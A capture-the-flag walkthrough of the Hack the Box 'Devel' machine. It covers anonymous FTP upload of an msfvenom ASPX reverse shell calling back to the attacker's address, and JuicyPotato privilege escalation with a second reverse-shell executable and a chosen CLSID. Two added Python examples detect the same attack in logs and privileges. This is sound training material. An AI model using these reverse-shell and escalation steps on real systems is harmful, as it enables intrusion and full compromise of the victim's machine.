Hack the Box - Devel - Walkthrough

Introduction

Today we're going to be doing a pentest walkthrough of the Devel machine hosted at https://hackthebox.eu. For this pentest, we'll be using a Kali Linux virtual machine as our attacking system and the Devel machine as the victim system. After connecting to the Hack the Box network via VPN, we see that our target is located at 10.129.98.96.

Scanning and Enumeration

We'll start by scanning for open ports with Nmap:

nmap -T4 -p- 10.129.98.96


Now we'll do another Nmap scan, this time specifying the ports and picking up service names and version numbers:

nmap -T4 -p21,80 10.129.98.96


Since we see that FTP is available, we now run some enumeration scripts with Nmap:

nmap --script="ftp*" -p21 10.129.98.96


The scan tells us that we can log in to FTP anonymously, so let's do a manual enumeration of the service:

ftp 10.129.98.96
anonymous

ls


Judging from the iisstart.htm file, it looks like the FTP service points us directly at the target's web root directory. We'll make a test file and see if we can access it from our web browser:

echo "test for devel" > test.txt


Back in the FTP service, we try to upload the test.txt file:

put test.txt
dir

The file is on the FTP server. Let's check that we can access it with our web browser:

http://10.129.98.96/test.txt


Finding a Way In

That confirms that we have arbitrary file upload on the webserver. Now we want to create a web file with a reverse shell payload back to our attacking system. Since the web server is running IIS, we'll create an ASPX file with MSFvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.99.99 LPORT=443 -f aspx -o HTBwinRevShell443.aspx


Now to upload it to the webserver via FTP:

put HTBwinRevShell443.aspx
dir

Before we execute our reverse shell by web browser, we need to start our Netcat listener on our attacking machine.

sudo nc -nlvp 443


Now to activate the reverse shell via web browser:

http://10.129.98.96/HTBwinRevShell443.aspx
whoami

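The chain just walked through (anonymous FTP login, STOR of an .aspx into the web root, then a GET to execute it) leaves a clear trail in the FTP server's logs. The following is an added example for this walkthrough, not code from the original post: it parses W3C-format FTP log lines (an assumed subset of fields; the log lines are constructed to mirror the uploads above) and flags completed anonymous uploads of executable web content.

```python
"""Flag anonymous FTP uploads of executable web content into the web root.

Added example, not part of the original walkthrough. The log below is
constructed to mimic IIS FTP W3C-format logging with an assumed subset of
fields; check the '#Fields:' line of your own logs before relying on it.
"""
from pathlib import PureWindowsPath

# Extensions IIS will execute (or that carry native code) if they land in wwwroot.
EXECUTABLE_EXT = {".aspx", ".asp", ".ashx", ".asmx", ".exe", ".dll"}

SAMPLE_LOG = """\
#Software: constructed sample
#Fields: date time c-ip cs-username cs-method cs-uri-stem sc-status
2021-05-01 10:02:11 10.10.99.99 anonymous USER anonymous 331
2021-05-01 10:02:11 10.10.99.99 anonymous PASS *** 230
2021-05-01 10:02:15 10.10.99.99 anonymous STOR /test.txt 226
2021-05-01 10:03:40 10.10.99.99 anonymous STOR /HTBwinRevShell443.aspx 226
2021-05-01 10:05:02 10.10.99.99 anonymous STOR /Juicy.Potato.x86.exe 226
2021-05-01 10:06:30 10.10.99.99 babis STOR /notes.txt 226
2021-05-01 10:07:00 10.10.99.99 anonymous STOR /blocked.aspx 550
"""


def parse_w3c(text):
    """Yield one dict per data row, keyed by the names in the #Fields: line."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        elif fields:
            yield dict(zip(fields, line.split()))


def find_anonymous_uploads(text):
    """Return (time, client, path) for completed anonymous STORs of executable content."""
    hits = []
    for row in parse_w3c(text):
        if row.get("cs-username", "").lower() != "anonymous":
            continue
        # 226 = transfer complete; a refused upload (e.g. 550) is not a hit
        if row.get("cs-method") != "STOR" or row.get("sc-status") != "226":
            continue
        ext = PureWindowsPath(row["cs-uri-stem"]).suffix.lower()
        if ext in EXECUTABLE_EXT:
            hits.append((row["time"], row["c-ip"], row["cs-uri-stem"]))
    return hits


if __name__ == "__main__":
    for hit in find_anonymous_uploads(SAMPLE_LOG):
        print("ALERT anonymous upload of executable content:", hit)
```

The plain text upload (test.txt) and the authenticated user's upload are deliberately not flagged; the rule targets the combination that gave the foothold here, anonymous write plus executable content in a served directory.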
Foothold Enumeration

We're logged in as a service account. Let's check our user's privileges:

whoami /priv


Our current user has the SeImpersonatePrivilege, which means we could potentially perform a Potato attack to escalate our privileges. Specifically, we'll be attacking the system with JuicyPotato. Before we proceed, let's take a look at the target's system information.

systeminfo
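Checking a service account for the privileges that the Potato family relies on is also a useful audit step on the defending side. The following is an added example, not code from the original post: it parses the tabular output of whoami /priv (the sample below is constructed) and reports which Potato-relevant privileges the account holds.

```python
"""Audit 'whoami /priv' output for privileges abused by the Potato family.

Added example, not part of the original walkthrough. The sample output is
constructed; feed parse_privileges() real output captured from a service
account (for example an IIS application pool identity) to triage it.
"""
import re

# Token privileges that JuicyPotato-style escalation depends on.
POTATO_PRIVS = {"SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege"}

SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# name, free-text description, then the state token at end of line
ROW = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")


def parse_privileges(text):
    """Return {privilege_name: state} from the tabular 'whoami /priv' output."""
    privs = {}
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            privs[m.group(1)] = m.group(3)
    return privs


def potato_exposure(text):
    """Sorted names of Potato-relevant privileges held by the account.

    'Disabled' only means the privilege is not currently enabled in the
    token; a process can still enable it, so both states count as exposure.
    """
    privs = parse_privileges(text)
    return sorted(p for p in privs if p in POTATO_PRIVS)


if __name__ == "__main__":
    print("Potato-relevant privileges:", potato_exposure(SAMPLE_WHOAMI_PRIV) or "none")
```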


Privilege Escalation

To perform a JuicyPotato attack, we need to know the target OS's version and architecture. Most modern OSs are 64-bit, and almost all of the Potato exploits use 64-bit executables, but our target's architecture is 32-bit. Fortunately, somebody created a 32-bit version of JuicyPotato just for cases like this, and it can be found at the following URL:

https://github.com/ivanitlearning/Juicy-Potato-x86

More specifically, the executable we want to use on the target is located here:

https://github.com/ivanitlearning/Juicy-Potato-x86/releases/download/1.2/Juicy.Potato.x86.exe

wget https://github.com/ivanitlearning/Juicy-Potato-x86/releases/download/1.2/Juicy.Potato.x86.exe

We'll also need to create an executable to pair with JuicyPotato that'll open a privileged reverse shell to our attacking system. Note that we also have to make sure that the executable we create is 32-bit. We'll do that with MSFvenom:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.99.99 LPORT=80 -f exe -o HTBrevshellX86p80.exe -a x86 --platform windows


Next, we'll upload the two executable files to the target using FTP, remembering to switch to binary mode so the files aren't corrupted during the transfer:

binary
put Juicy.Potato.x86.exe
put HTBrevshellX86p80.exe
dir

Before performing the attack, we need to set up another Netcat listener on port 80:

sudo nc -nlvp 80


Then navigate to the web root directory, which for this system is the following:

cd c:\inetpub\wwwroot\

Sometimes when we use JuicyPotato, we can simply run the attack using “standard” arguments like so:

Juicy.Potato.x86.exe -t * -l 6666 -p c:\inetpub\wwwroot\HTBrevshellX86p80.exe

However, on this target that will not work, so we'll need to supply the exploit with a valid CLSID for it to work properly. The GitHub repo for the regular 64-bit version of the exploit houses a list of CLSIDs here:

https://github.com/ohpe/juicy-potato/tree/master/CLSID

More specifically, our target is running Windows 7, so we need to look here:

https://github.com/ohpe/juicy-potato/tree/master/CLSID/Windows_7_Enterprise


The CLSID {69AD4AEE-51BE-439b-A92C-86AE490E8B30} listed there runs as NT AUTHORITY\SYSTEM, so we'll use that.

Juicy.Potato.x86.exe -t * -l 6666 -p c:\inetpub\wwwroot\HTBrevshellX86p80.exe -c {69AD4AEE-51BE-439b-A92C-86AE490E8B30}
whoami

Capturing the User Flag

User flags for Hack the Box Windows systems are usually located in a non-Administrator user's Desktop directory:

type c:\users\babis\desktop\user.txt.txt


Capturing the Root Flag

Root flags for Hack the Box Windows systems are usually in the Administrator user's Desktop directory:

type c:\users\administrator\desktop\root.txt


Summary

After initial scans, we found that the target's FTP service was configured to accept anonymous login and file upload. This, combined with the fact that the target's web root was also accessible via FTP, meant that a foothold could be established by uploading a malicious web file via FTP, then activating the malicious file's code in a web browser. Once inside, we found that the service account we had access to held SeImpersonatePrivilege, which allowed us to leverage the JuicyPotato token-impersonation exploit against the target to gain elevated access and capture our objective flag files.

Finish